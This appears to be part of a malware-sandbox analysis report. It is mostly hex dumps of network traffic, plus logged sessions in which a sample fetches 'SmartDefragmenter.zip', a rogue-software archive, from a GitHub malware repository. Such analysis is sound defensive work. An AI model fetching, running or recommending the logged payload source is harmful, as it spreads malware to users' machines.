                                                                                                                                                    2022-09-29 12:59:25 UTC36811INData Raw: c6 10 30 61 97 7e 38 e7 7f 0b 58 22 dc ac 7f 5f 1a f4 a7 13 53 df ec 07 d8 36 df c8 50 a9 9d e5 53 ac 83 45 c7 2b 92 53 db c7 6c 40 f5 a8 b9 13 83 b2 7f 6e 5d fb aa 54 9a da 62 5e d6 b8 9c 18 ce c2 3c 15 12 2a 28 07 c8 7e 7e 71 1b d9 9f f9 76 c7 47 b8 56 4a b5 80 12 85 9a 08 d8 5e d0 bc 5e 83 d3 5d 5d ee 82 f4 f8 8a f5 5c f5 81 4a 46 64 6a 7d 65 30 27 42 3a 68 8a 8a cb cf bd bb 6f 4f 8c 31 4d d2 40 03 d2 5c 7b 72 bf 96 3b d8 2a 56 52 54 6a d8 09 9a 21 8c da f5 26 fa 58 15 a2 6f 96 8f ee 40 32 e9 ce 72 29 72 b5 54 73 c2 58 e3 72 01 86 e0 31 ca 09 d8 7b b2 3f 97 94 a4 0e 8d 7d 4e f1 fc 2c 45 a6 a6 7d 35 8c 86 2e fa bf 60 9b 6a d3 8e 31 92 0e 84 43 5f 4a 12 d3 13 6d 0d 27 2e 52 1f 27 2c 90 65 37 02 21 30 2e fd c0 7c e8 aa 7d d5 07 a8 ed 76 29 e4 38 e0 d8 4f
                                                                                                                                                    Data Ascii: 0a~8X"_S6PSE+Sl@n]Tb^<*(~~qvGVJ^^]]\JFdj}e0'B:hoO1M@\{r;*VRTj!&Xo@2r)rTsXr1{?}N,E}5.`j1C_Jm'.R',e7!0.|}v)8O
                                                                                                                                                    2022-09-29 12:59:25 UTC36827INData Raw: 9d f8 2e 29 6d 6d 13 52 e6 8e 23 a1 56 2b dc f8 1d 66 ce fc 82 9d 8b bc 6e fa c2 30 24 0f 7f a6 e1 dd 05 77 1f c7 73 b9 ee 63 7e d5 9b 72 d2 07 55 ee 7c f7 25 9c 16 29 80 1a 12 56 ca 3e b1 8d bb dc 3f c9 c7 36 7a 7d 22 57 00 50 8a 8f 91 a1 3f 66 e1 40 c1 00 a1 14 d5 2a 55 00 66 53 1f 2a a8 8c 70 1f cb de 06 7a 6b e3 a3 57 ee 6f 67 23 b0 59 0c 1a d8 fd 3c 1c 0f 70 66 03 5c fb f9 c9 fc 74 02 8f 20 fd 55 0c 35 67 a1 19 74 a2 22 6c 30 68 c4 b4 f4 f7 ba af 1b f7 d4 4a 45 3d ba 15 a1 6b ea b7 f8 89 a4 6e 5e 9e 5f 4d 59 28 e0 40 8b 4b 7f 6f f8 39 06 60 e8 14 19 c2 72 0e 1c 77 6a 84 49 76 80 95 7e 3e 6a 79 37 ae 88 2f bd 2f 1e e0 42 72 8a 7c cb ca 6d 5e d7 2f 46 4f be 0f e3 9c 8f 0d 79 6f 91 fc d9 a9 2e 85 03 13 9c 41 27 2f 55 0c 4f 6f ee ff 78 5e de 39 d9 af 34
                                                                                                                                                    Data Ascii: .)mmR#V+fn0$wsc~rU|%)V>?6z}"WP?f@*UfS*pzkWog#Y<pf\t U5gt"l0hJE=kn^_MY(@Ko9`rwjIv~>jy7//Br|m^/FOyo.A'/UOox^94
                                                                                                                                                    2022-09-29 12:59:25 UTC36843INData Raw: a5 a3 f3 09 5b 2b 7a 78 d0 e0 aa ba 90 3a d7 2b 08 ee a8 71 e2 80 b1 97 b3 f5 d7 5c 0b c2 51 6e 45 be 1b c7 1f c4 72 2b 9b be 34 31 2c 0a 7d 22 06 8c bc 0a 67 e4 22 67 28 ee 9c cd 2f 19 bd 0e 4a 91 7b 97 9a 6f 19 37 46 c2 5d c5 75 3a 62 ea be 7e fb 22 55 db 81 d8 52 75 db 49 45 e6 43 d8 c2 c5 83 43 64 94 3f db 11 4b cf 53 7b 3c 28 bb dd 21 d3 1a fb 0b 28 31 75 4e 7a b0 ca 1a fd 5d 40 ca 62 e9 65 83 97 f5 ca 72 0a a5 59 96 bf 35 a2 d3 e7 67 79 b7 3b 8c 7b 1f 6f 8e d3 92 28 bd ca 8f 22 48 f3 11 39 ac 77 a6 7f 04 03 1a f4 0f 13 5f e9 5d 62 e4 08 d3 18 54 51 39 29 75 98 f1 be f1 ec 0a 98 b6 96 af 3a d9 36 ab 1c 2e 0b bd ea c5 0a 29 69 d1 5b 43 74 c6 65 1b 25 08 04 06 ee c2 e6 bd 0a 71 93 46 4e 1b 0f e6 16 c7 21 1d b9 33 2b 6e fe 2c 3e ec d9 66 41 39 2d 58 79
                                                                                                                                                    Data Ascii: [+zx:+q\QnEr+41,}"g"g(/J{o7F]u:b~"URuIECCd?KS{<(!(1uNz]@berY5gy;{o("H9w_]bTQ9)u:6.)i[Cte%qFN!3+n,>fA9-Xy
                                                                                                                                                    2022-09-29 12:59:25 UTC36859INData Raw: ad e5 8d 69 7a 6c 87 8e ec 71 0a 15 6b 6b 85 b4 2b a0 d6 c1 b7 f3 93 e5 14 2a 30 01 62 cb e0 03 21 9b 78 f7 c0 c6 b7 97 11 2f c8 3e f0 5a 8d 51 e0 67 44 e9 63 66 19 22 d7 25 9a 52 6b 53 d6 21 7b 9e d6 cc 8b 9c 27 68 70 80 98 05 9d 4f 86 a9 3d e9 7d 1a 95 a2 9f 59 40 5e d4 ef e5 83 c8 6b 1d 7e 1c 09 31 a7 40 8d 89 8f 4f 89 52 8c ea 7a c5 24 df 3a 97 6b a1 52 d1 92 2e 0b 86 6b ea b2 6e 49 72 86 c9 68 56 c4 f2 06 c1 d8 98 56 9f 96 c4 cb 63 6b d7 a5 70 eb 7a c1 c4 03 09 e3 b3 5e 67 81 c5 4b 19 fc 07 15 53 66 6d 07 78 b5 ae 3d 9d ca c6 6f d5 73 ce 64 2b ce 13 c0 27 48 f6 98 5b 7a a8 cf 41 b7 a0 c2 ca 5a cf 1e 4e 19 94 05 f0 23 54 db 91 57 36 4d 77 4f 3b 69 4d 02 f7 2e f8 66 b3 e7 90 db 2f 1a 89 a5 32 74 8a c7 ac a3 04 1c 39 79 9d d1 27 0d f8 0c bd 4d 60 fc 16
                                                                                                                                                    Data Ascii: izlqkk+*0b!x/>ZQgDcf"%RkS!{'hpO=}Y@^k~1@ORz$:kR.knIrhVVckpz^gKSfmx=osd+'H[zAZN#TW6MwO;iM.f/2t9y'M`
                                                                                                                                                    2022-09-29 12:59:25 UTC36875INData Raw: bc c8 97 22 97 89 57 5e 72 3d d6 1b 20 56 74 d7 2b 2c c7 79 e5 b5 ad 7b 98 b6 e6 64 07 0e 7f b0 68 a2 4a f6 2d f7 2b 5b 7c a2 af d1 be 5a 3f 68 8e 65 75 4c 4c bf 20 a9 e3 27 65 08 a9 50 9e d5 b5 2c 5f 81 aa d5 b4 b5 50 00 f7 6a 97 de 54 f6 0b 6c 07 d8 9d 15 b5 a8 43 ff 40 c1 e8 55 df 03 dd 8d 17 94 eb 64 f4 2b 4c 1f dc e1 89 66 0e e9 4d 0f 70 99 f9 4a ec 08 88 00 a2 b6 35 9c 1c 5b 1e e7 6d 72 37 9b f7 89 cc cc 9f 00 4d 03 c6 5c 56 8d 28 95 9a b7 cb d6 95 b2 fa d4 9e b0 e5 36 0c 38 8b 30 e9 f3 5d 3b cb 67 3c a9 8f 58 77 54 bd 1a 0f 77 db d4 ab 6b 30 d6 d0 fb d9 e0 92 3f 2d 43 b8 4f 11 42 90 8e ab df 66 5d 88 5b 76 84 9f 0a 39 32 17 e9 81 f6 61 6b 8d 58 6e 1e e7 a9 5f 8b 03 a3 b8 d8 2c 34 2e 55 ff 87 9e 32 de 9d 78 0f c5 f4 a8 d9 6f 5b 17 3f 6d df 05 a4 28
                                                                                                                                                    Data Ascii: "W^r= Vt+,y{dhJ-+[|Z?heuLL 'eP,_PjTlC@Ud+LfMpJ5[mr7M\V(680];g<XwTwk0?-COBf][v92akXn_,4.U2xo[?m(
                                                                                                                                                    2022-09-29 12:59:25 UTC36891INData Raw: 81 d3 8e c8 ca 10 81 f2 aa 7c 83 ac f7 93 eb 5d c3 2d 31 05 da 42 26 ff 6f 3b 41 31 b0 a6 a2 0e 29 5d b5 1e 64 aa 18 b0 54 5d 94 17 42 ca 94 27 35 cf 5c a8 16 73 02 b2 19 ce a1 cf c8 7b 14 46 84 58 6d 11 48 1f ed c6 77 9f 5d cc ad c0 c5 5b 39 5f 66 c3 2a d4 71 ae e2 f0 c8 53 09 68 d0 cc 9e c0 08 a5 1d 3a f8 28 ae 6e 3e 67 49 de ab 3a 57 1d 69 a4 fa 25 65 9e 88 fd 4d eb 04 00 4a 62 6a 5d f9 88 38 e1 6a 25 f1 12 f8 a2 cf 53 8c 0d 20 1e be 07 bc cd 59 b1 23 9a ea cc 09 c5 9d 9e f6 3a 2a fa 49 59 a8 aa 12 80 2c a3 06 1e 1d cb 51 00 df 27 ed ed 7c f3 83 1a b6 27 67 60 61 30 8d 7a 79 54 f1 9c cb aa f2 3f a0 be e5 1f 0b 0d 30 8c 03 96 0e 70 c6 37 85 8f 71 e9 30 19 f5 2e 76 49 e5 26 37 5b 6a 02 71 5e ce e2 8f 7b 88 63 e9 77 27 d7 b9 8a 1a 4e f5 74 37 70 5b 30 22
                                                                                                                                                    Data Ascii: |]-1B&o;A1)]dT]B'5\s{FXmHw][9_f*qSh:(n>gI:Wi%eMJbj]8j%S Y#:*IY,Q'|'g`a0zyT?0p7q0.vI&7[jq^{cw'Nt7p[0"
                                                                                                                                                    2022-09-29 12:59:25 UTC36907INData Raw: 30 74 62 ae 28 7b f0 4b e4 41 b9 10 c0 47 9a f7 44 5d b7 42 bc a7 cb ec f3 27 6e fd a1 41 e9 73 3f 6a 37 56 54 6f 6a 6e ab 11 57 4f 63 77 1c b7 8b 7d aa 9e 51 d3 a0 da ab b7 ce ef 10 67 8b d5 1f 3b 09 eb d8 09 26 66 67 6f d2 fb 07 7e cc 88 28 39 fa 43 ae 6e 30 82 58 b3 10 b6 34 58 08 52 f0 a5 73 27 64 44 d5 81 c7 11 2c 11 84 e0 ab 71 f7 74 60 14 6d dd 55 ba b8 04 13 a6 01 12 07 96 aa d6 61 ff b7 dc 64 cb f6 ef 3e 47 4b 96 c8 c5 79 1d 49 f7 e3 ed f0 01 bb c9 98 c0 d8 73 47 73 3e 81 ab 7b 64 28 01 af 21 99 fc e8 b1 93 19 6d 02 31 15 a9 02 8a 00 bb 3a fc 9f e7 9d 1c 9b 74 37 a0 13 bb 79 77 4d 7c a9 d3 a6 9f 43 83 20 fe 49 4b 41 39 2b e6 6b d2 f2 2d f6 07 29 31 cd e6 fe be e7 1a 3f 58 dd 81 e6 96 c8 fe 67 e0 93 8d 32 10 47 b6 7d f3 09 ec 1e 9f 19 ea 91 0f a4
                                                                                                                                                    Data Ascii: 0tb({KAGD]B'nAs?j7VTojnWOcw}Qg;&fgo~(9Cn0X4XRs'dD,qt`mUad>GKyIsGs>{d(!m1:t7ywM|C IKA9+k-)1?Xg2G}
                                                                                                                                                    2022-09-29 12:59:25 UTC36923INData Raw: bc dc e4 39 8d 2c 49 06 19 cc da 9d ef 15 7b b9 ed 5e a9 02 a2 97 5f e5 0f 95 96 26 89 ac 7e 1d 2b 0c b9 46 32 9e b1 f8 bc d3 6f f2 67 36 45 a6 72 d7 0d b0 8b f2 14 fc b1 75 0b 2d 4a 69 8b 62 13 5c 2e 6c c0 e5 47 c0 24 9a b6 4e 26 da fb 13 98 3c 4b cb 27 60 f7 c4 8c 47 07 dd 84 aa 7f 3e 44 8c 6a 1c 01 0c a6 6f 16 99 4f 83 98 4a 03 e1 e6 e7 97 29 2e 64 29 86 02 92 37 3e 30 d1 61 02 19 a7 d6 61 f6 02 56 9b a6 3d 92 9b 80 eb 3b ab 7e ab 6c 29 7e f5 6a 45 a2 a1 cc 77 8d 51 0c 56 79 ad 63 a3 a4 9a 00 70 b1 74 30 e9 c9 15 42 1f 4e f2 ac 01 18 67 30 3a 04 5d c4 43 7f 90 9e c0 9e 66 39 8c 2b 8f 71 a6 88 aa f9 f0 f0 90 7c 82 79 f3 f8 e9 03 68 37 94 7a 9e e3 2f bd 87 9c 14 48 bc 1f 35 92 16 a0 17 95 40 b5 07 2c 52 0d 5c 41 db 77 e0 60 27 fa e4 4d ab 5a aa e2 59 9f
                                                                                                                                                    Data Ascii: 9,I{^_&~+F2og6Eru-Jib\.lG$N&<K'`G>DjoOJ).d)7>0aaV=;~l)~jEwQVycpt0BNg0:]Cf9+q|yh7z/H5@,R\Aw`'MZY
                                                                                                                                                    2022-09-29 12:59:25 UTC36939INData Raw: 20 0b f4 b1 3e b7 bb cb 00 28 46 97 0f 06 ee 9b 24 8c c1 24 71 03 c7 43 20 20 2a f2 58 55 9b bf 36 c1 94 c0 bb bd b8 0b 98 8f 27 13 e2 66 e7 c4 eb 4e fd e2 c0 79 e3 d2 13 28 e3 9d 64 cf 60 3c 6c 1e fb bf 6f 3d 86 91 f8 7d e5 0e a6 1c d8 09 9c 8a 7b 9d 7e 9a 0c b1 05 c0 3b ff 6c 2f 85 ee 0e 92 1d ba 99 02 87 0c 13 1b 42 bd 12 f2 05 5b fc 1e b4 1f 95 6c 64 7e 63 79 d5 2a 9e a5 fa 47 3b 92 03 dc 95 ae 62 ba 7b 10 bd e3 90 72 c4 ba 73 57 d7 91 ec 78 43 cd db 3f 85 12 f4 56 d7 2f 66 80 8c 45 ba 52 e6 43 47 e7 f0 47 8f ca 8f 6a b4 73 78 49 88 35 6e 70 df d8 46 6a 9a 7d e8 06 d8 55 5a 2c 2f f6 69 04 6e ba 7c 95 d4 8a 58 05 a1 80 a2 8c 88 f3 5a cd 76 88 33 ec cf 4c 07 67 0d 21 c7 49 50 e4 b5 d6 f9 71 bc cf 9a ae ab 93 78 dc f8 42 59 f5 d2 4f 6a ef a2 56 41 16 17
                                                                                                                                                    Data Ascii: >(F$$qC *XU6'fNy(d`<lo=}{~;l/B[ld~cy*G;b{rsWxC?V/fERCGGjsxI5npFj}UZ,/in|XZv3Lg!IPqxBYOjVA
                                                                                                                                                    2022-09-29 12:59:25 UTC36955INData Raw: 2e d2 cc 2e 37 c5 85 3b 48 89 5d 77 55 50 23 2b 77 09 73 74 c6 74 42 d5 18 cd d6 28 dc f0 f9 a8 8f 8e f2 50 7b 9b 61 d1 87 aa 45 af c8 55 a5 cc 79 2a bf f5 bd 70 c5 2c 3b 5e 89 65 04 e9 15 f2 de 1a 14 1c d7 c9 79 c6 58 4d 3a 59 af e0 50 e4 85 62 38 00 9c a5 00 de 27 26 34 d2 b8 7e 83 f8 dc ca 21 38 4b 3a cd 40 68 71 b1 d3 cf 6d b5 2c 34 32 9b 37 3a 0d eb 8e e6 de b9 cf 8b 4f 0d 8f f0 93 56 52 6b a4 83 56 c3 e8 db 55 16 e9 ea 7c ce e6 8b d7 f8 dc 24 f8 8f 5d d6 3d ba 15 08 4f b5 e4 34 95 88 93 5a fa 91 6d ea 0e 87 92 e9 2b ff 85 e7 51 14 f4 cb 82 7e 48 3f 92 63 99 c6 b2 d2 ee 7c 46 d0 b3 61 09 aa b3 61 cf ac 3d f2 3a 2d a7 b2 bd 34 eb 13 34 b1 82 07 ab 84 83 d4 63 7b ac 0e 3d e6 4f 32 7e e7 12 8a 6a b5 c8 35 74 9c 60 a9 1a 23 74 68 35 9f 18 bf c0 a4 39 f3
                                                                                                                                                    Data Ascii: ..7;H]wUP#+wsttB(P{aEUy*p,;^eyXM:YPb8'&4~!8K:@hqm,427:OVRkVU|$]=O4Zm+Q~H?c|Faa=:-44c{=O2~j5t`#th59
                                                                                                                                                    2022-09-29 12:59:25 UTC36971INData Raw: 43 fb 4a 60 27 92 a2 6e 3f 67 a5 8f a3 00 fb 3e 79 ef a6 32 44 95 59 fa ee ed 6e 3f f6 47 21 e7 31 79 43 4b 2d 61 0d 9d 26 57 c4 b9 57 86 b2 a7 68 f1 6b b8 b1 8a 34 ac c5 5d c7 1a 66 be fb 60 65 74 e7 1f 4d bf 77 09 81 87 87 93 89 75 8d 67 60 d9 7d 7a 8a 05 d2 4a 5f 9f 14 e5 c0 5f c6 4d 7c 80 2a 4b 97 cd ae 26 a7 e0 75 52 1f 90 6a 55 99 22 c4 cd bb bb f8 d0 b8 46 62 d4 10 f9 d7 e2 7f 35 1d fa 68 62 4d 42 56 77 97 9c f3 3f 0c d7 52 9e 80 65 39 8f 54 78 78 05 ec 93 74 45 70 66 e1 6c db d1 a2 6f a3 67 05 e9 72 10 a2 76 60 fc 06 a7 68 96 0c bc 3c f5 36 c1 c6 b1 ec 88 a7 41 fb 5f 2f 30 88 dd 2a d5 36 5c ab b6 c6 cf 8a 1b 63 60 84 17 95 14 66 b2 f9 59 ea ac 95 d8 2d 70 0d a3 d8 a5 69 61 32 eb 63 7d ea 87 6f e7 bd 2d 68 d6 df 01 8a 41 24 69 1a 6c b4 eb bf 6a 6e
                                                                                                                                                    Data Ascii: CJ`'n?g>y2DYn?G!1yCK-a&WWhk4]f`etMwug`}zJ__M|*K&uRjU"Fb5hbMBVw?Re9TxxtEpflogrv`h<6A_/0*6\c`fY-pia2c}o-hA$iljn
                                                                                                                                                    2022-09-29 12:59:25 UTC36987INData Raw: fa 7f c8 4a 57 4c df 11 31 83 ba b9 9d e9 13 5d d4 03 53 2c 69 b5 ef 3c 71 d3 1b 5e 3d 25 1d 36 b7 65 3f 51 93 0f d3 89 25 3d bd d1 76 8f f7 45 5d 03 77 c5 08 d7 b0 1c 84 8e d5 a8 a6 f5 12 9b 1a 62 f0 5b 60 61 39 ed a6 65 8b 94 8e 9c 72 e2 09 83 a6 c9 13 7b 09 9c e7 69 c8 1f c3 28 cf 2d 95 48 8c 10 03 ae bc bc 55 af 71 a8 66 18 1f 1c 89 d7 57 19 ed 84 a9 4f d1 7c d9 84 36 aa 8a 3b 1b 6b fd 23 a0 2a 69 11 b7 f7 32 9d da bf c8 52 ca 01 98 61 12 8e 55 11 45 55 5c ea 4e 49 11 ce d2 71 c3 6d a2 de 09 d3 8b a7 bf e8 bc 4f af eb 49 2d 0d bb ce e9 e3 cd 36 ff 07 e3 51 8a 21 f2 d3 d0 47 53 60 a8 f4 c9 ff 94 fe 6b 5f 2e e3 59 7b 44 21 b4 94 77 b5 3d 68 bb 20 1e 14 e7 11 ff ba 30 e1 b8 b2 6c f7 0c 2f 19 11 cc 1f 3b b9 8f 49 08 da 05 17 a4 88 f4 01 f8 45 06 1c a3 96
                                                                                                                                                    Data Ascii: JWL1]S,i<q^=%6e?Q%=vE]wb[`a9er{i(-HUqfWO|6;k#*i2RaUEU\NIqmOI-6Q!GS`k_.Y{D!w=h 0l/;IE
                                                                                                                                                    2022-09-29 12:59:25 UTC37003INData Raw: 08 0a 7d 19 0b 95 4d 8b 95 48 34 dc 06 f4 ed 73 bd 42 62 8c 60 80 e4 1c 5a 9b 67 59 7d 72 3a b4 45 f0 53 d9 86 d1 10 93 44 52 88 72 94 07 af b8 48 79 b0 c6 e0 61 1f 63 d6 27 1a 24 4d 85 c5 94 c9 af 5e 66 c3 ba 14 08 56 74 e7 ef f4 99 e2 31 eb 69 32 3e c0 55 16 ab 13 9d 71 a9 c9 97 1e 4a a5 f6 e7 77 26 57 bd af 47 8b 4a 78 7d 17 fa 2e f2 cb 31 b7 20 c3 03 2f 74 84 0c 29 fe 41 f8 d8 da b7 b7 df b9 22 50 17 4c 40 6d 00 32 3d 8a f7 1f cb dd 6e e0 e3 f6 5b c3 d2 87 0f 13 a5 6b 94 f1 56 7f df d0 66 ab 61 09 5c da f6 77 5e b3 29 a6 fc ec 00 d8 73 f3 5e 12 83 95 df b8 d7 21 8b 49 78 b9 a4 e3 b4 09 2a 50 1f e6 f6 fd a2 d8 6e 53 b1 74 53 58 a4 d6 a0 74 11 a7 3c 88 be 95 60 97 50 7c c8 36 89 ce ec 3e 79 bc 40 bf f6 77 a5 b8 56 49 d6 55 9b f3 d0 64 60 40 fe 89 54 a6
                                                                                                                                                    Data Ascii: }MH4sBb`ZgY}r:ESDRrHyac'$M^fVt1i2>UqJw&WGJx}.1 /t)A"PL@m2=n[kVfa\w^)s^!Ix*PnStSXt<`P|6>y@wVIUd`@T


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    133192.168.2.349774140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:25 UTC37016OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/SmartDefragmenter.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    134140.82.121.3443192.168.2.349774C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:25 UTC37017INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:29 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/SmartDefragmenter.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:25 UTC37017INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    135192.168.2.349775185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:25 UTC37019OUTGET /Endermanch/MalwareDatabase/master/rogues/SmartDefragmenter.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    136185.199.108.133443192.168.2.349775C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:26 UTC37019INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 385789
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "f99f536fb7d24d720adda8a8578921ca78e3e35a963dab866adeac56f6cbe881"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 0809:045E:1D056D:1EA8B9:63359368
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:26 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6924-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456366.963957,VS0,VE162
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: cdfb06eb7477a14df906f9380da9b0ee51e5b6ed
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:26 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:26 UTC37020INData Raw: 50 4b 03 04 33 00 01 00 63 00 29 a0 23 4d 00 00 00 00 21 e2 05 00 00 d8 06 00 20 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 6d 61 72 74 44 65 66 72 61 67 6d 65 6e 74 65 72 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 b5 e6 bc 9a 40 a6 39 37 40 93 e2 67 5c 37 17 42 ff d7 79 b2 75 5e 52 47 29 e0 c4 bd 15 5c 4d ac d4 78 5e 56 42 bb c3 ec 6c 60 ed 0e 68 b0 df b3 1d 57 0d 50 38 b4 42 ef ad 3a b5 e3 28 4f 16 a5 f4 f2 56 fc 29 36 e3 83 25 bb 9f ed 3a d8 c5 58 9a 2c db ca c7 27 3c f9 7f 89 be ad 72 42 e9 a6 0f f0 d8 83 95 47 51 25 fa 70 7c e0 b8 70 22 4b 0b 84 68 e2 78 17 bd 74 19 d0 51 9a e8 ab d0 22 b3 6e bf 1d a5 55 92 87 b6 53 e2 96 bc 74 b2 83 ec 9d 3f d3 88 36 14 95 cc d3 8e a1 92 5d 5a e2 0d 7a 08 e8 c2 1c 23 61 aa 28 a8 76 5d 41 aa 5f 52 cd 93 2f a0 a8
                                                                                                                                                    Data Ascii: PK3c)#M! Endermanch@SmartDefragmenter.exeAE@97@g\7Byu^RG)\Mx^VBl`hWP8B:(OV)6%:X,'<rBGQ%p|p"KhxtQ"nUSt?6]Zz#a(v]A_R/
                                                                                                                                                    2022-09-29 12:59:26 UTC37021INData Raw: 98 77 e2 b3 cd 1f 68 37 0f f1 7a 32 1a 12 7c 00 96 ba 56 7e c7 1d e1 da a9 3b 4f d7 4e 25 1f 8b 39 77 18 7a bf fb 96 8e ee 02 e2 a1 6a 69 a2 13 5e 89 eb 9b 57 e8 1e d1 c6 56 d7 2c 69 1d a2 35 95 f8 49 bc df fb 78 43 14 8e 38 7d 28 be fe 5e 45 07 67 60 50 df 26 50 42 e6 4e 98 7f 14 58 bb 8c c0 5a ad 41 4b bc 40 86 19 18 c1 55 f5 cb 74 3a 23 4d 35 81 8a 62 e2 d5 29 09 a6 b0 ee e9 15 c4 a7 06 b9 c5 07 7c 88 21 5b 64 1c 39 72 b6 5a cd 59 05 fb fc 50 5a 4e 1e 03 5d 80 f1 b5 e6 70 f0 bc 53 3d 31 d2 ab 21 e4 14 45 25 36 cf 30 b3 7e 26 e6 53 64 df 54 37 f5 99 13 b9 fa 5c e6 0c 61 b6 e6 dc f5 54 fb a4 52 4e 89 89 a9 39 b0 6d 64 a5 b4 9a c4 5e 16 52 1d f4 7f bc c7 f5 15 c1 af 31 e0 07 a1 1e 78 91 ca 58 c0 0d 8f 2b 50 a5 50 f9 b0 b7 85 f1 87 92 f9 4c 1c f6 b0 9a 09
                                                                                                                                                    Data Ascii: wh7z2|V~;ON%9wzji^WV,i5IxC8}(^Eg`P&PBNXZAK@Ut:#M5b)|![d9rZYPZN]pS=1!E%60~&SdT7\aTRN9md^R1xX+PPL
                                                                                                                                                    2022-09-29 12:59:26 UTC37023INData Raw: 6e 0e 17 f8 7e b7 9a c1 b4 97 81 7b 2f da ad 0f af 47 a8 5a 7c 95 96 10 43 e2 c1 c3 7d ff 5e 9a 72 e2 cf 27 27 d9 2b c3 b8 ab 18 18 6c b0 ff 59 87 19 e1 94 db b4 ee 34 ca bc 2e ff a4 d2 fd e8 d2 5b 97 ff 78 d8 e9 87 c7 11 46 38 2d 3f 2e 73 d1 13 0d bc c1 3b 4c 14 a5 8d c8 81 f8 40 4c 14 dc f3 80 dc fd 62 5f eb 0b 35 21 27 dd a3 a3 34 33 c6 41 c3 e5 a0 ca f8 32 5e 5b 6e 2f 02 7d 5a d8 4b e5 0d 4e 8b da c0 82 90 93 0d a3 fe e4 6d 7d 35 99 7c 5b 35 16 64 3a 94 9f 88 a8 30 1d fc bc 71 20 88 37 7a f6 f8 a8 fc 00 26 1c 66 85 ef f9 cf 22 50 2d 31 3b 5f 9b bf 26 7c 06 0f 0b b6 fa 17 6c c0 8e 93 fb 82 40 c0 4f 4c 6b 31 ae b2 d3 a7 fe 4f 26 b5 2c 4e 8d e9 45 18 40 bf 0f ff 39 87 d4 7f ca c7 78 75 a3 71 8f 05 93 94 bd 73 56 5f 54 53 c4 00 9d e0 02 cb 59 cd 3f ce 6d
